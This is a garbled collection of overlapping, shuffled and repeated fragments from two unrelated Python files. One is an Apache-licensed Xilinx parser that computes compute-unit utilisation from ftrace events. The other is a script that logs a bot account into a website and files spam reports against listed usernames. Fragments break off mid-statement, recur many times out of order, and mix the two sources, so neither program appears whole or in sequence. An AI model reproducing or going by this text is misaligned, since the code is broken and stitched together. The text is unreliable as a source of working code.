import parser.parserBase", "class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents", "# http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing,", "ANY KIND, either express or implied. # See the License for the specific", "totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = []", "start = 0 for e in cuEvents[core]: eventType = e.func if eventType ==", "runT = 0 start = 0 for e in cuEvents[core]: eventType = e.func", "in compliance with the License. # You may obtain a copy of the", "coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = []", "e.timeStamp elif eventType == 'cu_done': if start == 0: continue # prefix, i.pid,", "[] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap']", "cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. # You may obtain", "cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT =", "% hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\":", "#cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l in data:", "= [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT", "print(\"##### Util of %s: %.2f\" % (core, runT * 100 / totalT)) return", "not use this file except in compliance with the License. 
# You may", "= [] runT = 0 start = 0 for e in cuEvents[core]: eventType", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or", "for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID =", "parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options):", "- cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT = 0", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"])", "cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"#####", "cuRetData[core] = [] runT = 0 start = 0 for e in cuEvents[core]:", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {}", "data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx)", "options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l in", "OF ANY KIND, either express or implied. 
# See the License for the", "= {} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options)", "2.0 (the \"License\"); # you may not use this file except in compliance", "start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT * 100", "obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by", "= \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event)", "options['cuMap'] cuEvents = {} cuRetData = {} for l in data: event =", "copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law", "# you may not use this file except in compliance with the License.", "{} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options) idx", "parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not", "start = e.timeStamp elif eventType == 'cu_done': if start == 0: continue #", "agreed to in writing, software # distributed under the License is distributed on", "start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of", "= cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT", "in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the", "__init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData", "if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et],", "cuEvents = {} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l,", "at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in", "(the \"License\"); # you may not use this file except in compliance with", "permissions and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs =", "eventType == 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime,", "runT += (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" %", "License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to", "# Copyright 2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0", "event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if", "== 0: continue cuRetData[core] = [] runT = 0 start = 0 for", "in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core]", "express or implied. # See the License for the specific language governing permissions", "import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data,", "...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT ==", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. 
# You may obtain a copy of", "88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util", "options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in", "by applicable law or agreed to in writing, software # distributed under the", "idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys():", "0 start = 0 for e in cuEvents[core]: eventType = e.func if eventType", "- start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT *", "prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp", "either express or implied. # See the License for the specific language governing", "== 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp,", "Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "\"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\"", "l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\"", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser):", "data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l", "may not use this file except in compliance with the License. 
# You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "# You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 #", "cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp", "eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif eventType ==", "may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "governing permissions and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs", "et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT", "else: continue print(\"##### Util of %s: %.2f\" % (core, runT * 100 /", "cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys():", "e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of %s:", "file except in compliance with the License. # You may obtain a copy", "for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0:", "License. 
# You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0", "in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" %", "i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start)", "def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {}", "= e.timeStamp elif eventType == 'cu_done': if start == 0: continue # prefix,", "event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] =", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "== 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color", "License for the specific language governing permissions and # limitations under the License.", "{\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp", "the License. # You may obtain a copy of the License at #", "Inc. 
# Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "[] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT =", "to in writing, software # distributed under the License is distributed on an", "= {} for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx']", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents =", "e.func if eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue", "implied. # See the License for the specific language governing permissions and #", "\"License\"); # you may not use this file except in compliance with the", "[[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp -", "e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp", "required by applicable law or agreed to in writing, software # distributed under", "parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self,", "i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else:", "coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": 
[[st, et], ...]}\"\"\"", "\"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp -", "Copyright 2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the", "super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData =", "+= (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" % (core,", "applicable law or agreed to in writing, software # distributed under the License", "You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless", "cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options) idx =", "specific language governing permissions and # limitations under the License. import parser.parserBase import", "continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT", "= options['cuMap'] cuEvents = {} cuRetData = {} for l in data: event", "or agreed to in writing, software # distributed under the License is distributed", "or implied. # See the License for the specific language governing permissions and", "for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start =", "start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start,", "cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT = 0 start", "= 0 for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start':", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. 
# See the License for", "= event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID]", "if totalT == 0: continue cuRetData[core] = [] runT = 0 start =", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "0: continue cuRetData[core] = [] runT = 0 start = 0 for e", "'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start == 0: continue", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "(e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT", "eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start ==", "with the License. # You may obtain a copy of the License at", "cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif eventType", "in writing, software # distributed under the License is distributed on an \"AS", "in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif", "under the Apache License, Version 2.0 (the \"License\"); # you may not use" ]
[ "= profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\")", "\"Spam potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status()", "\"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if", "import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\"", "login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>,", "login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url", "if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url,", "referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req", "= profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\")", "in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() referer", "Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = 
login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\")", "= login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not", "profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for", "Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer", "referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for", "referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url =", "= { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\"", "in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer", "for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url", "} profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\"", "import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url", "in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") 
s.headers.update({\"referer\": referer}) profile_alert_req", "username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup", "login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\")", "= login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req =", "= s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\",", "profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session()", "login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form =", "s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\")", "profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el", "login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\")", "bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = {", "el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) 
login_auth_req.raise_for_status() referer = login_auth_req.url # Sending", "in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] =", "= \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\"", "for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data:", "# Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status()", "\"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id", "action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in", "el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req =", "requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup =", "data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\":", "profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not", "profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" }", "login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True):", "= \"report-profile\" profile_form_data = { 
\"reason\": \"Spam potentiel\" } s = requests.session() #", "} s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer =", "BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in", "= el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url #", "login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form", "= s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in", "alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer =", "= \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, }", "from bs4 import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url =", "\"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data =", "id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if", "if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\":", "s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) 
login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts", "not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data)", "requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data", "login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer})", "bs4 import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\"", "\"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url)", "in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] =", "send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = {", "potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer", "login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer =", "s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames:", "= login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) 
for el in", "profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url", "el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req =", "\"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s =", "= \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s", "= profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in", "= s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\",", "s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url", "in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup =", "# Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content,", "bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username,", "bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\":", "{ \"username\": bot_username, \"password\": <PASSWORD>, } 
profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data", "= requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup", "if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\":", "login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for", "if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url,", "s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id)", "profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() referer =", "el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")]", "def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data =", "\"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs:", "profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in 
profile_form.find_all(name=True): if \"name\"", "login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if", "login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username)", "for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data:", "in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req", "= { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req", "el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status()", "referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form", "BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url =", "{ \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req =", "referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el", "profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form =", "el in login_form.find_all(name=True): if \"name\" in el.attrs: if not 
